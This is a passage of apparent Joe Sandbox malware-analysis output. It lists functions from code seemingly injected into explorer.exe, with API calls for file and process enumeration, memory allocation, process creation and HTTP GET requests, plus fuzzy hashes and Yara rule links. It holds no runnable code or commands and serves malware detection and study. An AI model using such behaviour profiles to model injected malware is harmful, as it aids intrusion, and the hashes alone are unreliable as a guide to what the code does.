                                                                                                                                                            • API String ID: 2498367268-1545510068
                                                                                                                                                            • Opcode ID: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                            • Instruction ID: 65c172513d5e3be3515f66ff2328b6c8badc238a5cabb5d9b3478db8e19ee8ee
                                                                                                                                                            • Opcode Fuzzy Hash: 163a1ef7f33438d4532239550843a801b488fff278782a1d37a7daa1ffc6847a
                                                                                                                                                            • Instruction Fuzzy Hash: 5A21A072118B848AE760DF14F45478BBBA5F3C4398F90821AE2D947BA8CB7DD589CF40
                                                                                                                                                            Function 02BE2B28 Relevance: 6.1, APIs: 4, Instructions: 112fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 02BEB388: NtAllocateVirtualMemory.NTDLL ref: 02BEB3BE
                                                                                                                                                            • FindFirstFileA.KERNEL32 ref: 02BE2BE7
                                                                                                                                                            • wsprintfA.USER32 ref: 02BE2CAD
                                                                                                                                                            • FindNextFileA.KERNEL32 ref: 02BE2CDA
                                                                                                                                                            • FindClose.KERNEL32 ref: 02BE2CED
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 65906682-0
                                                                                                                                                            • Opcode ID: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                            • Instruction ID: 9058f2b3b87c667967b80e5475ca76afac1b9b21ba43ce73d042ae37ed4c2601
                                                                                                                                                            • Opcode Fuzzy Hash: 19b5a71f4bd669ed1cbe17d3c7cdf1e0173d750f2f9a06502065251e799152bb
                                                                                                                                                            • Instruction Fuzzy Hash: 1751FC32219B8592DE60DB14F88439EB375FB84798F844566EA8F43B68EF7CC549CB40
                                                                                                                                                            Function 02BF00E8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c3b3089bdcd3129f3a52448b73f8afac48f5e8b6f1d6c41ce6d90fdca226db7f
                                                                                                                                                            • Instruction ID: 156148c4740bcde301bb6d22c51f4e6b3f62c69e4e81e40ef82db142387fed6a
                                                                                                                                                            • Opcode Fuzzy Hash: c3b3089bdcd3129f3a52448b73f8afac48f5e8b6f1d6c41ce6d90fdca226db7f
                                                                                                                                                            • Instruction Fuzzy Hash: FDE0EC9B54E7D81AD7676A380C6818D2F60E7A1F1178D94C3C3C0875AB9648440E8756
                                                                                                                                                            Function 02BEC860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                            • String ID: GET
                                                                                                                                                            • API String ID: 830097650-1805413626
                                                                                                                                                            • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                            • Instruction ID: 741f1e3aa85b77e29a20fc5a77d7dc908feb05387af704f681eadce8764aded9
                                                                                                                                                            • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                            • Instruction Fuzzy Hash: D241F336118A8082E760DB54F99875BBBA0F3C4798F101526E7CA83A69CFBDC048CB00
                                                                                                                                                            Function 02BE2D50 Relevance: 15.2, APIs: 10, Instructions: 232processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3605396869-0
                                                                                                                                                            • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                            • Instruction ID: 3e0d71e45e289fd66698af735b1082e2539bd4b85c67fda2d55bf6e166b52a93
                                                                                                                                                            • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                            • Instruction Fuzzy Hash: 5AC1E832209B8595DE60DB14E49039AB3B5FB88798F844566DACE43B6CEF3CC549CF41
                                                                                                                                                            Function 02BEBB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                            • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                            • Instruction ID: 65d12f8df3c6a80c74754bae3b6803c4acbb22df082826364e20ecdb2884784d
                                                                                                                                                            • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                            • Instruction Fuzzy Hash: CC41D536219B8582DFA0DB25E88476EB7A1F7C4B98F405565EA8F83B68DF3CC444CB40
                                                                                                                                                            Function 02BEC5C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                                            • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                            • Instruction ID: 4b4e02bbcca261911dbbe494800b84d25aa48deb43470b64b01bab06048ed394
                                                                                                                                                            • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                            • Instruction Fuzzy Hash: DC312D76218F8486DBA0DB15F98475AB7A0F7C8794F505622EA9F43BA8CF7CC484CB00
                                                                                                                                                            Function 02BE260C Relevance: 7.7, APIs: 5, Instructions: 174processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4137211488-0
                                                                                                                                                            • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                            • Instruction ID: 682059703bd158f74f91d3f922e0e6fd8f2aa600956fc836e2c2600acde4ab15
                                                                                                                                                            • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                            • Instruction Fuzzy Hash: EC810836219B81D6DE60DB14E48439AB3A9FB88794F941666DB8E43B7CEF38C505CF40
                                                                                                                                                            Function 02BE900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Internet$CloseHandle$Open
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2762225225-0
                                                                                                                                                            • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                            • Instruction ID: 336fadec57c3c2d720c4e287f0e268ef3f65cd5b67c05e342913052bab01938e
                                                                                                                                                            • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                            • Instruction Fuzzy Hash: AD51E072218A8086DB60CB59E49875EB7A0F7C5798F401026EBCA83B68DF7DC488CF01
                                                                                                                                                            Function 02BEB9A0 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.3894442891.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_2be0000_explorer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2803068115-0
                                                                                                                                                            • Opcode ID: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                                            • Instruction ID: 5815b6ef6544d3e3acfc6309bffb8b57a77e87c7c4e11679501969e2c5c6ae5b
                                                                                                                                                            • Opcode Fuzzy Hash: b18e833e66d955f35563fdfa70050700d38f2023f4f5055f34abfc6722212c5f
                                                                                                                                                            • Instruction Fuzzy Hash: 3C41E572209B8596DB60DB14E4843ABB7A1F7C8388F404526D6CA82A68EF7CC559CF40